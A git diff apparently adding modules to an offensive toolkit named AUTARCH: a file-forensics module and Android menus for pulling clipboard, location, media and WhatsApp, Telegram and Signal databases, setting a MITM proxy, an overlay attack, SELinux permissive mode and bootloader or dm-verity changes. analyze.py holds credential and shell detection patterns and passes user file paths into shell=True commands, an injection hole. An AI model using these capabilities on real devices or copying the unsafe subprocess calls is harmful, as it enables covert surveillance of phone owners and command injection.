print(f"\n\n{Colors.YELLOW}[!] Interrupted{Colors.RESET}")
break
def run(self):
"""Module entry point."""
clear_screen()
display_banner()
print(f"{Colors.BOLD}{Colors.WHITE} AUTARCH Autonomous Agent{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
# Check if model is loaded
if not self.llm.is_loaded:
self.print_status("Loading model...", "info")
try:
self.llm.load_model(verbose=True)
except LLMError as e:
self.print_status(f"Failed to load model: {e}", "error")
self.print_status("Please run setup to configure a model.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
self.interactive_loop()
def run():
"""Module entry point."""
interface = AgentInterface()
interface.run()
if __name__ == "__main__":
run()

1453
modules/agent_hal.py Normal file

File diff suppressed because it is too large Load Diff

417
modules/analyze.py Normal file
View File

@@ -0,0 +1,417 @@
"""
AUTARCH Analyze Module
Forensics and analysis tools
File analysis, hash generation, string extraction, and more.
"""
import os
import sys
import subprocess
import hashlib
import re
try:
import magic
except ImportError:
magic = None
from pathlib import Path
from datetime import datetime
# Module metadata
DESCRIPTION = "Forensics & file analysis tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class Analyzer:
"""Forensics and analysis tools."""
def __init__(self):
pass
def print_status(self, message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def run_cmd(self, cmd: str) -> tuple:
try:
result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=60)
return result.returncode == 0, result.stdout.strip()
except:
return False, ""
def get_file_hashes(self, filepath: str) -> dict:
"""Calculate various hashes for a file."""
p = Path(filepath)
if not p.exists() or not p.is_file():
return {}
hashes = {}
with open(p, 'rb') as f:
content = f.read()
hashes['md5'] = hashlib.md5(content).hexdigest()
hashes['sha1'] = hashlib.sha1(content).hexdigest()
hashes['sha256'] = hashlib.sha256(content).hexdigest()
return hashes
def analyze_file(self):
"""Comprehensive file analysis."""
print(f"\n{Colors.BOLD}File Analysis{Colors.RESET}")
filepath = input(f"{Colors.WHITE}Enter file path: {Colors.RESET}").strip()
if not filepath:
return
p = Path(filepath).expanduser()
if not p.exists():
self.print_status(f"File not found: {filepath}", "error")
return
print(f"\n{Colors.CYAN}{'' * 50}{Colors.RESET}")
print(f"{Colors.BOLD}File: {p.name}{Colors.RESET}")
print(f"{Colors.CYAN}{'' * 50}{Colors.RESET}\n")
# Basic info
stat = p.stat()
print(f"{Colors.CYAN}Basic Info:{Colors.RESET}")
print(f" Path: {p.absolute()}")
print(f" Size: {stat.st_size:,} bytes")
print(f" Modified: {datetime.fromtimestamp(stat.st_mtime)}")
print(f" Created: {datetime.fromtimestamp(stat.st_ctime)}")
print(f" Mode: {oct(stat.st_mode)}")
# File type
print(f"\n{Colors.CYAN}File Type:{Colors.RESET}")
try:
file_magic = magic.Magic(mime=True)
mime_type = file_magic.from_file(str(p))
print(f" MIME: {mime_type}")
file_magic = magic.Magic()
file_desc = file_magic.from_file(str(p))
print(f" Type: {file_desc}")
except:
success, output = self.run_cmd(f"file '{p}'")
if success:
print(f" Type: {output.split(':', 1)[-1].strip()}")
# Hashes
print(f"\n{Colors.CYAN}Hashes:{Colors.RESET}")
hashes = self.get_file_hashes(str(p))
for algo, value in hashes.items():
print(f" {algo.upper():8} {value}")
# Check if executable
if p.suffix in ['.exe', '.dll', '.so', '.elf', ''] or stat.st_mode & 0o111:
self.analyze_executable(str(p))
def analyze_executable(self, filepath: str):
"""Additional analysis for executables."""
print(f"\n{Colors.CYAN}Executable Analysis:{Colors.RESET}")
# Strings
success, output = self.run_cmd(f"strings '{filepath}' 2>/dev/null | head -50")
if success and output:
# Look for interesting strings
interesting = []
patterns = [
r'https?://[^\s]+', # URLs
r'\d+\.\d+\.\d+\.\d+', # IPs
r'password|passwd|secret|key|token', # Credentials
r'/bin/sh|/bin/bash|cmd\.exe', # Shells
]
for line in output.split('\n'):
for pattern in patterns:
if re.search(pattern, line, re.I):
interesting.append(line.strip())
break
if interesting:
print(f" {Colors.YELLOW}Interesting strings found:{Colors.RESET}")
for s in interesting[:10]:
print(f" {s[:80]}")
# Check for packing
success, output = self.run_cmd(f"readelf -h '{filepath}' 2>/dev/null")
if success:
if 'Entry point' in output:
print(f" ELF executable detected")
def extract_strings(self):
"""Extract strings from file."""
print(f"\n{Colors.BOLD}String Extraction{Colors.RESET}")
filepath = input(f"{Colors.WHITE}Enter file path: {Colors.RESET}").strip()
if not filepath:
return
p = Path(filepath).expanduser()
if not p.exists():
self.print_status(f"File not found", "error")
return
min_len = input(f"{Colors.WHITE}Minimum string length [4]: {Colors.RESET}").strip() or "4"
print(f"\n{Colors.CYAN}Extracting strings...{Colors.RESET}\n")
success, output = self.run_cmd(f"strings -n {min_len} '{p}' 2>/dev/null")
if success:
lines = output.split('\n')
print(f"Found {len(lines)} strings\n")
# Categorize
urls = [l for l in lines if re.search(r'https?://', l)]
ips = [l for l in lines if re.search(r'\b\d+\.\d+\.\d+\.\d+\b', l)]
paths = [l for l in lines if re.search(r'^/[a-z]', l, re.I)]
emails = [l for l in lines if re.search(r'[\w.-]+@[\w.-]+', l)]
if urls:
print(f"{Colors.CYAN}URLs ({len(urls)}):{Colors.RESET}")
for u in urls[:10]:
print(f" {u}")
if ips:
print(f"\n{Colors.CYAN}IP Addresses ({len(ips)}):{Colors.RESET}")
for ip in ips[:10]:
print(f" {ip}")
if emails:
print(f"\n{Colors.CYAN}Emails ({len(emails)}):{Colors.RESET}")
for e in emails[:10]:
print(f" {e}")
if paths:
print(f"\n{Colors.CYAN}Paths ({len(paths)}):{Colors.RESET}")
for p in paths[:10]:
print(f" {p}")
# Save option
save = input(f"\n{Colors.WHITE}Save all strings to file? (y/n): {Colors.RESET}").strip().lower()
if save == 'y':
outfile = f"{p.stem}_strings.txt"
with open(outfile, 'w') as f:
f.write(output)
self.print_status(f"Saved to {outfile}", "success")
def hash_lookup(self):
"""Look up hash in threat intel."""
print(f"\n{Colors.BOLD}Hash Lookup{Colors.RESET}")
hash_input = input(f"{Colors.WHITE}Enter hash (MD5/SHA1/SHA256): {Colors.RESET}").strip()
if not hash_input:
return
# Determine hash type
hash_len = len(hash_input)
if hash_len == 32:
hash_type = "MD5"
elif hash_len == 40:
hash_type = "SHA1"
elif hash_len == 64:
hash_type = "SHA256"
else:
self.print_status("Invalid hash length", "error")
return
print(f"\n{Colors.CYAN}Hash Type: {hash_type}{Colors.RESET}")
print(f"{Colors.CYAN}Hash: {hash_input}{Colors.RESET}\n")
# VirusTotal URL
print(f"{Colors.DIM}VirusTotal: https://www.virustotal.com/gui/file/{hash_input}{Colors.RESET}")
print(f"{Colors.DIM}Hybrid Analysis: https://www.hybrid-analysis.com/search?query={hash_input}{Colors.RESET}")
def analyze_log(self):
"""Analyze log files for anomalies."""
print(f"\n{Colors.BOLD}Log Analysis{Colors.RESET}")
print(f"{Colors.DIM}Common logs: /var/log/auth.log, /var/log/syslog, /var/log/apache2/access.log{Colors.RESET}\n")
filepath = input(f"{Colors.WHITE}Enter log file path: {Colors.RESET}").strip()
if not filepath:
return
p = Path(filepath).expanduser()
if not p.exists():
self.print_status(f"File not found", "error")
return
print(f"\n{Colors.CYAN}Analyzing {p.name}...{Colors.RESET}\n")
# Read log
try:
with open(p, 'r', errors='ignore') as f:
lines = f.readlines()
except Exception as e:
self.print_status(f"Error reading file: {e}", "error")
return
print(f"Total lines: {len(lines)}")
# Extract IPs
all_ips = []
for line in lines:
ips = re.findall(r'\b(\d+\.\d+\.\d+\.\d+)\b', line)
all_ips.extend(ips)
if all_ips:
from collections import Counter
ip_counts = Counter(all_ips)
print(f"\n{Colors.CYAN}Top IP Addresses:{Colors.RESET}")
for ip, count in ip_counts.most_common(10):
print(f" {ip:20} {count:>6} occurrences")
# Look for error patterns
errors = [l for l in lines if re.search(r'error|fail|denied|invalid', l, re.I)]
if errors:
print(f"\n{Colors.YELLOW}Error/Failure entries: {len(errors)}{Colors.RESET}")
print(f"{Colors.DIM}Recent errors:{Colors.RESET}")
for e in errors[-5:]:
print(f" {e.strip()[:100]}")
# Timestamps
timestamps = []
for line in lines:
match = re.search(r'(\w{3}\s+\d+\s+\d+:\d+:\d+)', line)
if match:
timestamps.append(match.group(1))
if timestamps:
print(f"\n{Colors.CYAN}Time Range:{Colors.RESET}")
print(f" First: {timestamps[0]}")
print(f" Last: {timestamps[-1]}")
def hex_dump(self):
"""Create hex dump of file."""
print(f"\n{Colors.BOLD}Hex Dump{Colors.RESET}")
filepath = input(f"{Colors.WHITE}Enter file path: {Colors.RESET}").strip()
if not filepath:
return
p = Path(filepath).expanduser()
if not p.exists():
self.print_status(f"File not found", "error")
return
offset = input(f"{Colors.WHITE}Start offset [0]: {Colors.RESET}").strip() or "0"
length = input(f"{Colors.WHITE}Length [256]: {Colors.RESET}").strip() or "256"
try:
offset = int(offset, 0) # Support hex input
length = int(length, 0)
except:
self.print_status("Invalid offset/length", "error")
return
print(f"\n{Colors.CYAN}Hex dump of {p.name} (offset={hex(offset)}, length={length}):{Colors.RESET}\n")
with open(p, 'rb') as f:
f.seek(offset)
data = f.read(length)
# Format hex dump
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_part = ' '.join(f'{b:02x}' for b in chunk)
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
print(f" {offset+i:08x} {hex_part:<48} {ascii_part}")
def compare_files(self):
"""Compare two files."""
print(f"\n{Colors.BOLD}File Comparison{Colors.RESET}")
file1 = input(f"{Colors.WHITE}First file: {Colors.RESET}").strip()
file2 = input(f"{Colors.WHITE}Second file: {Colors.RESET}").strip()
if not file1 or not file2:
return
p1 = Path(file1).expanduser()
p2 = Path(file2).expanduser()
if not p1.exists() or not p2.exists():
self.print_status("One or both files not found", "error")
return
print(f"\n{Colors.CYAN}Comparing files...{Colors.RESET}\n")
# Size comparison
s1, s2 = p1.stat().st_size, p2.stat().st_size
print(f"File 1 size: {s1:,} bytes")
print(f"File 2 size: {s2:,} bytes")
print(f"Difference: {abs(s1-s2):,} bytes")
# Hash comparison
h1 = self.get_file_hashes(str(p1))
h2 = self.get_file_hashes(str(p2))
print(f"\n{Colors.CYAN}Hash Comparison:{Colors.RESET}")
for algo in ['md5', 'sha256']:
match = h1.get(algo) == h2.get(algo)
status = f"{Colors.GREEN}MATCH{Colors.RESET}" if match else f"{Colors.RED}DIFFERENT{Colors.RESET}"
print(f" {algo.upper()}: {status}")
if h1.get('sha256') != h2.get('sha256'):
# Show diff if text files
success, output = self.run_cmd(f"diff '{p1}' '{p2}' 2>/dev/null | head -30")
if success and output:
print(f"\n{Colors.CYAN}Differences (first 30 lines):{Colors.RESET}")
print(output)
def show_menu(self):
clear_screen()
display_banner()
print(f"{Colors.CYAN}{Colors.BOLD} Analysis & Forensics{Colors.RESET}")
print(f"{Colors.DIM} File analysis and forensics tools{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
print(f" {Colors.CYAN}[1]{Colors.RESET} Analyze File")
print(f" {Colors.CYAN}[2]{Colors.RESET} Extract Strings")
print(f" {Colors.CYAN}[3]{Colors.RESET} Hash Lookup")
print(f" {Colors.CYAN}[4]{Colors.RESET} Analyze Log")
print(f" {Colors.CYAN}[5]{Colors.RESET} Hex Dump")
print(f" {Colors.CYAN}[6]{Colors.RESET} Compare Files")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
def run(self):
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
if choice == "0":
break
elif choice == "1":
self.analyze_file()
elif choice == "2":
self.extract_strings()
elif choice == "3":
self.hash_lookup()
elif choice == "4":
self.analyze_log()
elif choice == "5":
self.hex_dump()
elif choice == "6":
self.compare_files()
if choice in ["1", "2", "3", "4", "5", "6"]:
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
break
def run():
Analyzer().run()
if __name__ == "__main__":
run()

380
modules/android_advanced.py Normal file
View File

@@ -0,0 +1,380 @@
"""
Android Advanced Exploits - Network, app manipulation, system control, data exfil
"""
DESCRIPTION = "Android advanced exploits (network, apps, system, data extraction)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidAdvanced:
"""Interactive menu for advanced Android exploits."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
print(f" {i}) {d['serial']} {d.get('model','')}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*60}")
print(" Advanced Android Exploits")
print(f"{'='*60}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" ── Data Exfiltration ──")
print(" [1] Clipboard Content")
print(" [2] Notifications")
print(" [3] Location Data")
print(" [4] List Media Files")
print(" [5] Pull Media Folder")
print(" [6] WhatsApp DB [ROOT]")
print(" [7] Telegram DB [ROOT]")
print(" [8] Signal DB [ROOT]")
print(" [9] Dump Settings (all)")
print(" [10] Device Fingerprint")
print(" [11] Dump Any Database [ROOT]")
print()
print(" ── Network ──")
print(" [20] Network Info")
print(" [21] Set Proxy (MITM)")
print(" [22] Clear Proxy")
print(" [23] Set DNS [ROOT]")
print(" [24] WiFi Scan")
print(" [25] WiFi Connect")
print(" [26] WiFi On/Off")
print(" [27] Enable Hotspot")
print(" [28] Capture Traffic [ROOT]")
print(" [29] Port Forward")
print(" [30] ADB over WiFi")
print()
print(" ── App Manipulation ──")
print(" [40] Grant Permission")
print(" [41] Revoke Permission")
print(" [42] List App Permissions")
print(" [43] Disable App")
print(" [44] Enable App")
print(" [45] Clear App Data")
print(" [46] Force Stop App")
print(" [47] Launch App")
print(" [48] Launch Activity")
print(" [49] Send Broadcast")
print(" [50] Content Query")
print(" [51] Enable Overlay")
print()
print(" ── System ──")
print(" [60] SELinux Permissive [ROOT]")
print(" [61] Remount /system RW [ROOT]")
print(" [62] Logcat Sensitive Data")
print(" [63] Deploy Frida Server [ROOT]")
print(" [64] Running Processes")
print(" [65] Open Ports")
print(" [66] Modify Setting")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def _print_result(self, r):
import json
if isinstance(r, dict):
for k, v in r.items():
if isinstance(v, (list, dict)) and len(str(v)) > 200:
print(f" {k}: [{len(v)} items]" if isinstance(v, list) else f" {k}: [dict]")
else:
val = str(v)
if len(val) > 120:
val = val[:120] + '...'
print(f" {k}: {val}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
elif choice == 's':
self._select_device()
continue
if not self._ensure_device():
continue
try:
self._dispatch(choice)
except (EOFError, KeyboardInterrupt):
continue
def _dispatch(self, choice):
s = self.serial
m = self.mgr
# Data Exfil
if choice == '1':
self._print_result(m.extract_clipboard(s))
elif choice == '2':
r = m.dump_notifications(s)
print(f" {r.get('count', 0)} notifications:")
for n in r.get('notifications', [])[:20]:
print(f" [{n.get('package','')}] {n.get('title','')} - {n.get('text','')}")
elif choice == '3':
self._print_result(m.extract_location(s))
elif choice == '4':
t = input(" Type (photos/downloads/screenshots/whatsapp_media): ").strip() or 'photos'
r = m.extract_media_list(s, media_type=t)
print(f" {r['count']} files in {r['path']}:")
for f in r['files'][:30]:
print(f" {f}")
elif choice == '5':
t = input(" Type (photos/downloads/screenshots): ").strip() or 'photos'
lim = input(" Limit [50]: ").strip()
r = m.pull_media_folder(s, media_type=t, limit=int(lim) if lim else 50)
print(f" Pulled {r['count']} files to {r.get('output_dir','')}")
elif choice == '6':
r = m.extract_whatsapp_db(s)
self._print_result(r)
elif choice == '7':
r = m.extract_telegram_db(s)
self._print_result(r)
elif choice == '8':
r = m.extract_signal_db(s)
self._print_result(r)
elif choice == '9':
r = m.dump_all_settings(s)
for ns, entries in r.get('settings', {}).items():
print(f"\n [{ns}] ({len(entries)} entries)")
for k, v in list(entries.items())[:10]:
print(f" {k}={v}")
if len(entries) > 10:
print(f" ... and {len(entries)-10} more")
elif choice == '10':
fp = m.get_device_fingerprint(s)
print("\n Device Fingerprint:")
for k, v in fp.items():
print(f" {k:<25} {v}")
elif choice == '11':
db_path = input(" Database path on device: ").strip()
table = input(" Table name (or Enter to list tables): ").strip() or None
r = m.dump_database(s, db_path, table=table)
if r['success']:
print(f" Tables: {', '.join(r['tables'])}")
if r['rows']:
for row in r['rows'][:10]:
print(f" {row}")
else:
print(f" Error: {r['error']}")
# Network
elif choice == '20':
info = m.get_network_info(s)
for k, v in info.items():
val = str(v)[:200]
print(f" {k}: {val}")
elif choice == '21':
host = input(" Proxy host: ").strip()
port = input(" Proxy port: ").strip()
if host and port:
r = m.set_proxy(s, host, port)
print(f" Proxy set: {r.get('proxy')}")
elif choice == '22':
m.clear_proxy(s)
print(" Proxy cleared.")
elif choice == '23':
dns1 = input(" DNS1: ").strip()
dns2 = input(" DNS2 (optional): ").strip()
if dns1:
m.set_dns(s, dns1, dns2)
print(f" DNS set: {dns1} {dns2}")
elif choice == '24':
r = m.wifi_scan(s)
print(r.get('output', 'No results'))
elif choice == '25':
ssid = input(" SSID: ").strip()
pwd = input(" Password (Enter for open): ").strip()
if ssid:
r = m.wifi_connect(s, ssid, pwd)
print(f" {r.get('output', 'Done')}")
elif choice == '26':
action = input(" Enable or disable? [e/d]: ").strip().lower()
if action == 'd':
m.wifi_disconnect(s)
print(" WiFi disabled.")
else:
m.wifi_enable(s)
print(" WiFi enabled.")
elif choice == '27':
ssid = input(" Hotspot SSID [AUTARCH_AP]: ").strip() or 'AUTARCH_AP'
pwd = input(" Password [autarch123]: ").strip() or 'autarch123'
r = m.enable_hotspot(s, ssid, pwd)
print(f" Hotspot: {ssid}")
elif choice == '28':
iface = input(" Interface [any]: ").strip() or 'any'
dur = input(" Duration seconds [30]: ").strip()
filt = input(" Filter (optional): ").strip()
r = m.capture_traffic(s, iface, int(dur) if dur else 30, filt)
if r['success']:
print(f" PCAP saved: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r['error']}")
elif choice == '29':
lp = input(" Local port: ").strip()
rp = input(" Remote port: ").strip()
if lp and rp:
r = m.port_forward(s, lp, rp)
print(f" Forward: localhost:{lp} -> device:{rp}")
elif choice == '30':
port = input(" Port [5555]: ").strip() or '5555'
r = m.enable_adb_wifi(s, int(port))
print(f" ADB WiFi: {r.get('connect_cmd', '?')}")
# App Manipulation
elif choice == '40':
pkg = input(" Package: ").strip()
perm = input(" Permission (e.g. android.permission.CAMERA): ").strip()
if pkg and perm:
r = m.grant_permission(s, pkg, perm)
print(f" {r.get('output', 'Done')}")
elif choice == '41':
pkg = input(" Package: ").strip()
perm = input(" Permission: ").strip()
if pkg and perm:
r = m.revoke_permission(s, pkg, perm)
print(f" {r.get('output', 'Done')}")
elif choice == '42':
pkg = input(" Package: ").strip()
if pkg:
r = m.list_permissions(s, pkg)
print(f" Granted ({len(r['granted'])}):")
for p in r['granted'][:20]:
print(f" + {p}")
print(f" Denied ({len(r['denied'])}):")
for p in r['denied'][:10]:
print(f" - {p}")
elif choice == '43':
pkg = input(" Package to disable: ").strip()
if pkg:
r = m.disable_app(s, pkg)
print(f" {r.get('output', 'Done')}")
elif choice == '44':
pkg = input(" Package to enable: ").strip()
if pkg:
r = m.enable_app(s, pkg)
print(f" {r.get('output', 'Done')}")
elif choice == '45':
pkg = input(" Package to clear: ").strip()
if pkg:
confirm = input(f" Clear ALL data for {pkg}? [y/N]: ").strip().lower()
if confirm == 'y':
r = m.clear_app_data(s, pkg)
print(f" {r.get('output', 'Done')}")
elif choice == '46':
pkg = input(" Package to force stop: ").strip()
if pkg:
m.force_stop_app(s, pkg)
print(f" Force stopped {pkg}")
elif choice == '47':
pkg = input(" Package to launch: ").strip()
if pkg:
m.launch_app(s, pkg)
print(f" Launched {pkg}")
elif choice == '48':
comp = input(" Component (com.pkg/.Activity): ").strip()
extras = input(" Extras (optional am flags): ").strip()
if comp:
r = m.launch_activity(s, comp, extras)
print(f" {r.get('output', 'Done')}")
elif choice == '49':
action = input(" Broadcast action: ").strip()
extras = input(" Extras (optional): ").strip()
if action:
r = m.send_broadcast(s, action, extras)
print(f" {r.get('output', 'Done')}")
elif choice == '50':
uri = input(" Content URI: ").strip()
proj = input(" Projection (col1:col2 or Enter): ").strip()
where = input(" Where clause (or Enter): ").strip()
if uri:
r = m.content_query(s, uri, proj, where)
print(f" {r['count']} rows:")
for row in r['rows'][:20]:
print(f" {row}")
elif choice == '51':
pkg = input(" Package for overlay: ").strip()
if pkg:
m.overlay_attack_enable(s, pkg)
print(f" Overlay enabled for {pkg}")
# System
elif choice == '60':
r = m.set_selinux(s, 'permissive')
print(f" SELinux: {r.get('mode', '?')}")
elif choice == '61':
r = m.remount_system(s)
print(f" /system remounted {r.get('mode')}: {r.get('output','')}")
elif choice == '62':
dur = input(" Scan duration [10]: ").strip()
r = m.logcat_sensitive(s, int(dur) if dur else 10)
print(f" Found {r['count']} sensitive lines:")
for line in r['lines'][:20]:
print(f" {line[:120]}")
elif choice == '63':
path = input(" Frida server binary path: ").strip()
if path:
r = m.deploy_frida(s, path)
if r['success']:
print(f" Frida running, PID: {r['pid']}")
else:
print(f" Error: {r.get('error')}")
elif choice == '64':
r = m.get_running_processes(s)
print(f" {r['count']} processes:")
for p in r['processes'][:30]:
print(f" {p.get('pid','?'):>6} {p.get('user',''):>12} {p.get('name','')}")
elif choice == '65':
r = m.get_open_ports(s)
print(f" {r['count']} listening ports:")
for p in r['ports']:
print(f" {p}")
elif choice == '66':
ns = input(" Namespace (system/secure/global): ").strip()
key = input(" Key: ").strip()
val = input(" Value: ").strip()
if ns and key and val:
r = m.modify_setting(s, ns, key, val)
print(f" {ns}.{key} = {r.get('value','?')}")
else:
print(" Invalid choice.")
def run():
m = AndroidAdvanced()
m.run_interactive()

165
modules/android_apps.py Normal file
View File

@@ -0,0 +1,165 @@
"""
Android App Extraction - Pull APKs, app data, shared preferences
"""
DESCRIPTION = "Android app extraction (APK pull, app data, shared prefs)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidApps:
"""Interactive menu for Android app extraction."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
devices = self.hw.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
if len(devices) == 1:
self.serial = devices[0]['serial']
print(f" Selected: {self.serial}")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
model = d.get('model', '')
print(f" {i}) {d['serial']} {model}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.serial = devices[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" App Extraction")
print(f"{'='*50}")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] List Packages")
print(" [2] Pull APK")
print(" [3] Pull App Data (root/debuggable)")
print(" [4] Extract Shared Prefs")
print(" [s] Select Device")
print(" [0] Back")
print()
def list_packages(self):
if not self._ensure_device():
return
try:
inc = input(" Include system apps? [y/N]: ").strip().lower() == 'y'
except (EOFError, KeyboardInterrupt):
return
result = self.mgr.list_packages(self.serial, include_system=inc)
if 'error' in result:
print(f" Error: {result['error']}")
return
print(f"\n Found {result['count']} packages:")
for pkg in result['packages']:
flag = ' [SYS]' if pkg['is_system'] else ''
print(f" {pkg['package']}{flag}")
print(f" {pkg['path']}")
def pull_apk(self):
if not self._ensure_device():
return
try:
package = input(" Package name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not package:
return
print(f" Pulling APK for {package}...")
result = self.mgr.pull_apk(self.serial, package)
if result['success']:
size_mb = result['size'] / (1024 * 1024)
print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
else:
print(f" Error: {result['error']}")
def pull_app_data(self):
if not self._ensure_device():
return
try:
package = input(" Package name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not package:
return
print(f" Pulling app data for {package}...")
result = self.mgr.pull_app_data(self.serial, package)
if result['success']:
print(f" Output dir: {result['output_dir']}")
for f in result['files']:
print(f" {f}")
else:
print(" No data extracted (need debuggable app or root).")
def extract_prefs(self):
if not self._ensure_device():
return
try:
package = input(" Package name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not package:
return
print(f" Extracting shared prefs for {package}...")
result = self.mgr.extract_shared_prefs(self.serial, package)
if result['success']:
print(f" Found {result['count']} pref files:")
for name, content in result['prefs'].items():
print(f"\n --- {name} ---")
# Show first 20 lines
lines = content.split('\n')[:20]
for line in lines:
print(f" {line}")
if len(content.split('\n')) > 20:
print(" ...")
else:
print(f" Error: {result.get('error', 'Failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
elif choice == '1':
self.list_packages()
elif choice == '2':
self.pull_apk()
elif choice == '3':
self.pull_app_data()
elif choice == '4':
self.extract_prefs()
elif choice == 's':
self._select_device()
else:
print(" Invalid choice.")
def run():
m = AndroidApps()
m.run_interactive()

203
modules/android_boot.py Normal file
View File

@@ -0,0 +1,203 @@
"""
Android Boot / Recovery Exploit - Bootloader unlock, flash, dm-verity
"""
DESCRIPTION = "Android boot/recovery exploits (flash, unlock, verity bypass)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidBoot:
"""Interactive menu for boot/recovery operations."""
def __init__(self):
from core.android_exploit import get_exploit_manager
from core.hardware import get_hardware_manager
self.mgr = get_exploit_manager()
self.hw = get_hardware_manager()
self.serial = None
def _select_device(self):
"""Select from fastboot devices (boot ops need fastboot mostly)."""
fb_devices = self.hw.fastboot_devices()
adb_devices = self.hw.adb_devices()
all_devs = []
for d in fb_devices:
all_devs.append({'serial': d['serial'], 'mode': 'fastboot'})
for d in adb_devices:
all_devs.append({'serial': d['serial'], 'mode': 'adb'})
if not all_devs:
print(" No devices found (ADB or fastboot).")
return
if len(all_devs) == 1:
self.serial = all_devs[0]['serial']
print(f" Selected: {self.serial} ({all_devs[0]['mode']})")
return
print("\n Select device:")
for i, d in enumerate(all_devs, 1):
print(f" {i}) {d['serial']} [{d['mode']}]")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(all_devs):
self.serial = all_devs[choice - 1]['serial']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.serial:
self._select_device()
return self.serial is not None
def show_menu(self):
print(f"\n{'='*50}")
print(" Boot / Recovery Exploit")
print(f"{'='*50}")
print(" !! WARNING: Can BRICK device / WIPE data !!")
print(f" Device: {self.serial or '(none)'}")
print()
print(" [1] Bootloader Info")
print(" [2] Backup Boot Image")
print(" [3] Unlock Bootloader [WIPES DATA]")
print(" [4] Flash Custom Recovery")
print(" [5] Flash Boot Image")
print(" [6] Disable dm-verity/AVB")
print(" [7] Temp Boot (no flash)")
print(" [s] Select Device")
print(" [0] Back")
print()
def bootloader_info(self):
if not self._ensure_device():
return
print(" Querying bootloader...")
info = self.mgr.get_bootloader_info(self.serial)
if not info:
print(" No info returned (device might not be in fastboot mode).")
return
print(f"\n Bootloader Variables:")
for k, v in info.items():
print(f" {k:<25} {v}")
def backup_boot(self):
if not self._ensure_device():
return
print(" Backing up boot image (requires root via ADB)...")
result = self.mgr.backup_boot_image(self.serial)
if result['success']:
size_mb = result['size'] / (1024 * 1024)
print(f" Saved: {result['local_path']} ({size_mb:.1f} MB)")
else:
print(f" Error: {result.get('error', 'Failed')}")
def unlock_bootloader(self):
if not self._ensure_device():
return
print("\n !! WARNING: This will WIPE ALL DATA on the device !!")
try:
confirm = input(" Type 'YES' to proceed: ").strip()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'YES':
print(" Cancelled.")
return
print(" Unlocking bootloader...")
result = self.mgr.unlock_bootloader(self.serial)
if result['success']:
print(" Bootloader unlocked (or confirmation pending on device).")
else:
print(f" Result: {result.get('output', 'Unknown')}")
def flash_recovery(self):
if not self._ensure_device():
return
try:
img = input(" Recovery image path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not img:
return
print(" Flashing recovery...")
result = self.mgr.flash_recovery(self.serial, img)
if result.get('success'):
print(f" Flash started (op: {result.get('op_id', '?')})")
else:
print(f" Error: {result.get('error', 'Failed')}")
def flash_boot(self):
if not self._ensure_device():
return
try:
img = input(" Boot image path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not img:
return
print(" Flashing boot...")
result = self.mgr.flash_boot(self.serial, img)
if result.get('success'):
